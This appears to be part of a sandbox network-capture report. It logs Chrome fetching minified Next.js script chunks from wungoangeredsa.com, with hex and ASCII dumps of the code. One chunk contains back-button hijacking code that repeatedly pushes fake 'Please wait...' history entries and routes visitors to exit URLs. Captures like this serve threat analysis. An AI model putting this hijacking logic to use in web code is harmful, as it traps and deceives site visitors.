                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 70 6f 73 69 74 69 6f 6e 29 7c 7c 22 69 6e 68 65 72 69 74 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 69 2c 6f 3b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 28 69 3d 6e 2e 74 68 65 6d 65 2e 71 75 65 73 74 69 6f 6e 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 69 2e 77 72 61 70 70 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 74 6f 70 29 7c 7c 22 61 75 74 6f 22 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 69 2c 6f 3b 72 65 74 75 72 6e 28 6e 75 6c 6c 3d 3d 3d 28 69 3d 6e 2e 74 68 65 6d 65 2e 71 75 65 73 74 69 6f 6e 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 69 2e 77 72 61 70 70 65 72 29 7c
                                                                                                          Data Ascii: ===o?void 0:o.position)||"inherit"}),(function(n){var i,o;return(null===(i=n.theme.questions)||void 0===i||null===(o=i.wrapper)||void 0===o?void 0:o.top)||"auto"}),(function(n){var i,o;return(null===(i=n.theme.questions)||void 0===i||null===(o=i.wrapper)|
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 7b 76 61 72 20 69 2c 6f 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 69 3d 6e 2e 74 68 65 6d 65 2e 71 75 65 73 74 69 6f 6e 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 69 2e 77 72 61 70 70 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 66 6c 65 78 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 69 2c 6f 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 69 3d 6e 2e 74 68 65 6d 65 2e 71 75 65 73 74 69 6f 6e 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 69 7c 7c 6e 75 6c 6c 3d 3d 3d 28 6f 3d 69 2e 77 72 61 70 70 65 72 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6f 3f 76 6f 69 64 20 30 3a 6f 2e 61 6c 69 67 6e 49 74 65 6d 73 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 69 2c 6f 3b 72 65
                                                                                                          Data Ascii: {var i,o;return null===(i=n.theme.questions)||void 0===i||null===(o=i.wrapper)||void 0===o?void 0:o.flex}),(function(n){var i,o;return null===(i=n.theme.questions)||void 0===i||null===(o=i.wrapper)||void 0===o?void 0:o.alignItems}),(function(n){var i,o;re


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          67192.168.2.450116104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC638OUTGET /_next/static/chunks/d6be0b89fa7aeaa3-1736072686539.cf6cc9096c69f504.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:23 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-18a3"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1056
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:23 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb416bcee142f5-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:23 UTC873INData Raw: 31 38 61 33 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 37 32 32 30 5d 2c 7b 37 35 35 35 32 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 69 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 6f 3d 22 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 22 7d 2c 36 36 32 33 36 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 76 61 72 20 6f 3b 72 2e 64 28 74 2c 7b 4f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 66 75 6e
                                                                                                          Data Ascii: 18a3"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[17220],{75552:function(n,t,r){r.d(t,{i:function(){return o}});var o="-apple-system, Roboto, Helvetica, sans-serif"},66236:function(n,t,r){var o;r.d(t,{O:function(){return o}}),fun
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 29 3b 72 65 74 75 72 6e 20 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 76 61 72 20 6e 3d 28 30 2c 66 2e 5a 29 28 5b 22 5c 6e 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 5c 6e 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 5c 6e 20 20 20 20 22 5d 29 3b 72 65 74 75 72 6e 20 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 29 7b 76 61 72 20 6e 3d 28 30 2c 66 2e 5a 29 28 5b 22 5c 6e 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 34 66 37 3b 5c 6e 20 20 20 20 22 5d 29 3b 72 65 74 75 72 6e 20 4f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 76 28 29
                                                                                                          Data Ascii: );return s=function(){return n},n}function p(){var n=(0,f.Z)(["\n left: 0;\n right: 0;\n "]);return p=function(){return n},n}function O(){var n=(0,f.Z)(["\n background-color: #f1f4f7;\n "]);return O=function(){return n},n}function v()
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 43 28 29 7b 76 61 72 20 6e 3d 28 30 2c 66 2e 5a 29 28 5b 22 5c 6e 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 22 2c 22 3b 5c 6e 5c 6e 20 20 61 20 7b 5c 6e 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 35 70 78 3b 5c 6e 20 20 7d 5c 6e 5c 6e 20 20 22 2c 22 3b 5c 6e 20 20 22 2c 22 3b 5c 6e 5c 6e 20 20 22 2c 22 3b 5c 6e 5c 6e 20 20 22 2c 22 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 43 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 29 7b 76 61 72 20 6e 3d 28 30 2c 66 2e 5a 29 28 5b 22 5c 6e 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 31 32 35 32 39 3b 5c 6e 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20
                                                                                                          Data Ascii: ion(){return n},n}function C(){var n=(0,f.Z)(["\n font-size: ",";\n\n a {\n margin-left: 5px;\n }\n\n ",";\n ",";\n\n ",";\n\n ",";\n"]);return C=function(){return n},n}function L(){var n=(0,f.Z)(["\n color: #212529;\n background:
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 29 3b 5c 6e 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 24 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 29 7b 76 61 72 20 6e 3d 28 30 2c 66 2e 5a 29 28 5b 22 5c 6e 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 5c 6e 20 20 67 61 70 3a 20 31 30 70 78 3b 5c 6e 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 5c 6e 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 22 2c 22 3b 5c 6e 22 5d 29 3b 72 65 74 75 72 6e 20 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 6e 7d 76 61 72 20 77 3d 61 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 63 6f 6d 70 6f 6e 65 6e 74 49 64 3a 22 73 63 2d 61 39 34 39 62 36 64 2d 30 22 7d 29 28 5f 28 29 2c 28 66 75 6e
                                                                                                          Data Ascii: );\n width: 30px;\n"]);return $=function(){return n},n}function m(){var n=(0,f.Z)(["\n display: flex;\n gap: 10px;\n margin: auto;\n max-width: ",";\n"]);return m=function(){return n},n}var w=a.ZP.div.withConfig({componentId:"sc-a949b6d-0"})(_(),(fun
                                                                                                          2025-01-06 11:09:23 UTC1335INData Raw: 34 39 62 36 64 2d 32 22 7d 29 28 6b 28 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 24 64 65 73 69 67 6e 3d 3d 3d 65 2e 4f 2e 4c 49 47 48 54 26 26 28 30 2c 61 2e 69 76 29 28 4c 28 29 29 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 24 64 65 73 69 67 6e 3d 3d 3d 65 2e 4f 2e 42 4c 55 45 26 26 28 30 2c 61 2e 69 76 29 28 5a 28 29 29 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 6e 2e 24 64 65 73 69 67 6e 3b 72 65 74 75 72 6e 28 74 3d 3d 3d 65 2e 4f 2e 44 41 52 4b 7c 7c 74 3d 3d 3d 65 2e 4f 2e 44 41 52 4b 5f 43 4c 4f 53 45 5f 49 43 4f 4e 29 26 26 28 30 2c 61 2e 69 76 29 28 49 28 29 29 7d 29 29 2c 44 3d 61 2e 5a 50 2e 64 69 76 2e 77 69 74 68 43 6f 6e 66 69 67 28 7b 63 6f 6d 70 6f 6e 65
                                                                                                          Data Ascii: 49b6d-2"})(k(),(function(n){return n.$design===e.O.LIGHT&&(0,a.iv)(L())}),(function(n){return n.$design===e.O.BLUE&&(0,a.iv)(Z())}),(function(n){var t=n.$design;return(t===e.O.DARK||t===e.O.DARK_CLOSE_ICON)&&(0,a.iv)(I())})),D=a.ZP.div.withConfig({compone
                                                                                                          2025-01-06 11:09:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          68192.168.2.450112104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC638OUTGET /_next/static/chunks/593553c1eec4cbba-1736072686539.97c2038dc0b2daf0.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:23 UTC495INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-17c"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1056
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:23 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb416bda8641de-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:23 UTC387INData Raw: 31 37 63 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 39 36 30 30 5d 2c 7b 39 39 36 30 30 3a 66 75 6e 63 74 69 6f 6e 28 41 2c 65 2c 74 29 7b 74 2e 72 28 65 29 2c 65 2e 64 65 66 61 75 6c 74 3d 7b 73 72 63 3a 22 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 6d 65 64 69 61 2f 66 5f 32 34 2e 61 30 62 30 34 62 33 39 2e 77 65 62 70 22 2c 68 65 69 67 68 74 3a 35 31 32 2c 77 69 64 74 68 3a 35 31 32 2c 62 6c 75 72 44 61 74 61 55 52 4c 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 77 65 62 70 3b 62 61 73 65 36 34 2c 55 6b 6c 47 52 6c 67 41 41 41 42 58 52 55 4a 51 56 6c 41 34 49 45 77 41 41 41 41 51 41 67
                                                                                                          Data Ascii: 17c"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[99600],{99600:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_24.a0b04b39.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlgAAABXRUJQVlA4IEwAAAAQAg
                                                                                                          2025-01-06 11:09:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          69192.168.2.450114104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC497OUTGET /_next/static/chunks/946b720792ec3642-1736072686539.5fb83dbc00ce11a5.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:23 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-1891"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1056
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:23 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb416bf8e432ca-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:23 UTC873INData Raw: 31 38 39 31 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 38 32 34 39 5d 2c 7b 34 33 36 30 31 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 69 29 7b 69 2e 64 28 65 2c 7b 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b 76 61 72 20 74 2c 6f 3d 69 28 32 39 35 30 35 29 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 70 61 72 73 65 49 6e 74 28 6e 75 6c 6c 21 3d 3d 28 74 3d 28 30 2c 6f 2e 65 6a 29 28 6e 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 22 30 22 2c 31 30 29 7d 7d 2c 35 30 36 35 36 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 69 29 7b 69
                                                                                                          Data Ascii: 1891"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[68249],{43601:function(n,e,i){i.d(e,{N:function(){return r}});var t,o=i(29505),r=function(n){return parseInt(null!==(t=(0,o.ej)(n))&&void 0!==t?t:"0",10)}},50656:function(n,e,i){i
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 74 75 72 6e 20 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 6e 29 7d 7d 29 2c 5b 5d 29 3b 72 65 74 75 72 6e 7b 69 6e 69 74 42 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3b 69 66 28 62 2e 62 61 63 6b 2e 69 73 45 6e 61 62 6c 65 64 29 69 66 28 65 3e 31 32 26 26 4e 29 28 30 2c 61 2e 79 4e 29 28 22 69 6e 69 74 42 61 63 6b 3a 20 54 6f 6f 20 6d 75 63 68 20 70 75 73 68 53 74 61 74 65 54 6f 48 69 73 74 6f 72 79 22 29 3b 65 6c 73 65 7b 76 61 72 20 6c 2c 64 2c 66 2c 55 2c 6b 3d 6e 75 6c 6c 21 3d 3d 28 6c 3d 62 2e 62 61 63 6b 2e 68 69 73 74 6f 72 79 54 69 6d 65 41 6d 6f 75 6e 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 6c 3f 6c 3a 33 2c 5f 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 62 2e 62 61 63 6b 2e 7a 6f 6e 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f
                                                                                                          Data Ascii: turn clearInterval(n)}}),[]);return{initBack:function(n){var t;if(b.back.isEnabled)if(e>12&&N)(0,a.yN)("initBack: Too much pushStateToHistory");else{var l,d,f,U,k=null!==(l=b.back.historyTimeAmount)&&void 0!==l?l:3,_=null===(t=b.back.zones)||void 0===t?vo
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 6f 6e 28 6e 2c 65 2c 69 29 7b 74 72 79 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 65 3b 74 2b 3d 31 29 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 70 75 73 68 53 74 61 74 65 28 6e 75 6c 6c 2c 22 50 6c 65 61 73 65 20 77 61 69 74 2e 2e 2e 22 2c 6e 29 2c 69 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2b 31 7d 29 29 7d 63 61 74 63 68 28 6f 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 46 61 69 6c 65 64 20 74 6f 20 70 75 73 68 20 73 74 61 74 65 2c 20 65 72 72 6f 72 3a 22 2c 6f 29 7d 7d 28 22 2f 62 61 63 6b 3f 22 2e 63 6f 6e 63 61 74 28 54 29 2c 6b 2c 69 29 7d 65 6c 73 65 28 30 2c 61 2e 79 4e 29 28 22 5a 6f 6e 65 20 22 2e 63 6f 6e 63 61 74 28 6e 2c 22 20 69 73 20 6e 6f 74 20 65 6e 61 62 6c 65 64 22 29 29 3b 65 6c 73 65 20 63 6f 6e
                                                                                                          Data Ascii: on(n,e,i){try{for(var t=0;t<e;t+=1)window.history.pushState(null,"Please wait...",n),i((function(n){return n+1}))}catch(o){console.error("Failed to push state, error:",o)}}("/back?".concat(T),k,i)}else(0,a.yN)("Zone ".concat(n," is not enabled"));else con
                                                                                                          2025-01-06 11:09:23 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 6f 29 7d 7d 65 6c 73 65 7b 76 61 72 20 61 3d 5b 22 74 6f 75 63 68 73 74 61 72 74 22 2c 22 63 6c 69 63 6b 22 5d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 68 61 6e 64 6c 65 41 63 74 69 76 69 74 79 22 29 2c 72 28 21 30 29 2c 61 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 6e 2c 75 2c 21 30 29 7d 29 29 7d 3b 61 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 6e 2c 75 2c 21 30
                                                                                                          Data Ascii: function(){return window.clearInterval(o)}}else{var a=["touchstart","click"],u=function(){console.log("handleActivity"),r(!0),a.forEach((function(n){return window.removeEventListener(n,u,!0)}))};a.forEach((function(n){return window.addEventListener(n,u,!0
                                                                                                          2025-01-06 11:09:23 UTC1317INData Raw: 69 6f 6e 28 6e 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 6e 2c 65 29 7d 29 29 29 5d 3a 5b 33 2c 32 5d 3b 63 61 73 65 20 31 3a 6e 2e 73 65 6e 74 28 29 2c 6e 2e 6c 61 62 65 6c 3d 32 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 65 2c 74 3d 50 7c 7c 42 7c 7c 4d 7c 7c 5a 2c 61 3d 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 71 2e 65 78 69 74 55 72 6c 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 6c 65 6e 67 74 68 29 7c 7c 30 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 50 7c 7c 71 2e 6e 6f 6e 55 6e 69 71 75 65 2e 69 73 43 68 65 63 6b 65 64 29 69 66 28 21 42 7c 7c 71 2e 6e 6f 6e 55 6e 69 71 75 65 2e 69 73 43 68 65 63 6b 65 64 29 7b 69 66 28 77 29 7b 69 66 28 4d 29 72 65 74 75 72 6e 28 30 2c
                                                                                                          Data Ascii: ion(n){setTimeout(n,e)})))]:[3,2];case 1:n.sent(),n.label=2;case 2:return function(){var n,e,t=P||B||M||Z,a=(null===(n=q.exitUrls)||void 0===n?void 0:n.length)||0,u=function(){if(!P||q.nonUnique.isChecked)if(!B||q.nonUnique.isChecked){if(w){if(M)return(0,
                                                                                                          2025-01-06 11:09:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          70192.168.2.450117104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:23 UTC497OUTGET /_next/static/chunks/c2f96434bddabe6e-1736072686539.3a22e244b1dff92a.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: OAID=1zy28050kovbfyyc4yz4gsq62pkmaxhb; syncedCookie=true; oaidts=1736161760
                                                                                                          2025-01-06 11:09:23 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:23 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-1722"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1056
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:23 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb416c19613338-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:23 UTC873INData Raw: 31 37 32 32 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 34 36 38 33 5d 2c 7b 36 34 36 38 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 6f 29 7b 6f 2e 72 28 6e 29 2c 6f 2e 64 28 6e 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 7d 29 3b 76 61 72 20 69 3d 6f 28 39 38 37 38 38 29 2c 74 3d 6f 28 32 32 39 37 30 29 2c 63 3d 6f 28 31 32 31 33 39 29 2c 72 3d 6f 28 31 33 39 32 33 29 2c 61 3d 6f 28 37 31 39 36 31 29 2c 73 3d 6f 28 31 39 34 39 35 29 2c 75 3d 6f 28 39 35 37 39 38 29 2c 6c 3d 6f 28 39 30 39 37 29 2c 66 3d 6f 28 34 33 36 30 31 29 2c 6d 3d
